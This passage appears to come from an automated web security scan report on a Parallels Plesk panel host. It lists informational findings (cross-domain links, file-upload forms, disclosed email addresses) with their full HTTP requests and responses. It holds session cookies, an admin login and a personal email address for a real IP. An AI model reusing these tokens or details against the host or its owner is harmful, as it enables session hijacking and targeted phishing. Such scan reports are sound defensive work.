Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:12:22 GMT
Connection: close
Content-Length: 49536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.21. http://174.122.23.218:8880/smb/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /smb/login?returnUrl=%2Fuser%2Flist HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:03:01 GMT
Connection: close
Content-Length: 8558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; 1999-2010, Parallels. All rights reserved.</a>
...[SNIP]...

8. File upload functionality  previous  next
There are 3 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


8.1. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/create-file/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/create-file/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

POST /plesk/client@1/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2Fbaseline
Cache-Control: max-age=0
Origin: http://174.122.23.218:8880
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMeEAWKQhARAb0z0B
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains
Content-Length: 995

------WebKitFormBoundaryMeEAWKQhARAb0z0B
Content-Disposition: form-data; name="filter"


------WebKitFormBoundaryMeEAWKQhARAb0z0B
Content-Disposition: form-data; name="page"

0
------WebKitFor
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 03:09:20 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:09:24 GMT
Connection: close
Content-Length: 23778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<td><input type="file" name="userfile[0]"> <label for="fid-extract1">
...[SNIP]...

8.2. http://174.122.23.218:8880/smb/app/add  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/add

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /smb/app/add HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/market/id/marketplace
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:21 GMT
Connection: close
Content-Length: 15442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class='field-value'>

<input type="file" name="package[file]" id="package-file" />
<span class='field-errors' style="display:none;">
...[SNIP]...

8.3. http://174.122.23.218:8880/smb/scripts/file-sharing.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/scripts/file-sharing.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /smb/scripts/file-sharing.js?1278564502 HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/file/index/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: application/x-javascript
Last-Modified: Thu, 08 Jul 2010 04:48:22 GMT
Accept-Ranges: bytes
ETag: "0afe2ca581ecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:17:07 GMT
Content-Length: 156825

Jsw.namespace('Smb.FileSharing');

Smb.FileSharing = {

getFileUrl: function(storageUrl, folderPath, fileName) {
var uri = '';

$A(folderPath.split('/')).each(

...[SNIP]...
<div class="form-row">' +
'<input name="file" type="file" size="75"/>' +
(itemsCount ? ' <a href="#" class="s-btn sb-item-remove">
...[SNIP]...

9. Email addresses disclosed  previous  next
There are 15 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


9.1. http://174.122.23.218:8880/smb/email-address/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/email-address/list

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/list HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://174.122.23.218:8880/smb/user/list
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=true; user=54a8ad2443247fe6e4900290dc4e0cf8; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:04:25 GMT
Connection: close
Content-Length: 20054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
ate E-mail Address',
description: 'Create a new e-mail address in the system and assign it to a user. To create a business e-mail address not associated with any particular user (like sales@mycompany.com), go to Mailing Lists tab and create a mailing list.',
addCls: 'bb-mail-account-add',
href: '/email-address/create',
disabled: false })

...[SNIP]...

9.2. http://174.122.23.218:8880/smb/file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://174.122.23.218:8880/smb/app/market/id/marketplace
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:28 GMT
Connection: close
Content-Length: 55128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.3. http://174.122.23.218:8880/smb/file/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:53 GMT
Connection: close
Content-Length: 55406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.4. http://174.122.23.218:8880/smb/file/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:52 GMT
Connection: close
Content-Length: 55406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.5. http://174.122.23.218:8880/smb/file/index/type/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/ HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:50 GMT
Connection: close
Content-Length: 55406


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...

9.6. http://174.122.23.218:8880/smb/file/index/type/external  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/external

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/file/index/type/external HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/file
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:54 GMT
Connection: close
Content-Length: 49536


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
\/protected","url":"http:\/\/plesk.cloudscan.me:80\/files\/protected\/"}},
userContactName: 'admin',
userLogin: 'admin',
users: {"1":{"id":"1","contactName":"admin","email":"h02332@gmail.com"}},
isBuiltIn: true,
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Share',
description: 'Move sele
...[SNIP]...
s:","enterAdditionalAddresses":"External e-mails that should receive the links:","enterAdditionalAddressesHint":"Separate e-mail addresses with a comma, semicolon, new line or whitespace, for example: email@domain1.com,email@domain2.com","emailSubject":"E-mail Subject","emailBody":"E-mail Body","linkTypeShared":"Only authorized Panel users who have the links can access and modify these files.","linkTypePublic":"Everyone who has the l
...[SNIP]...
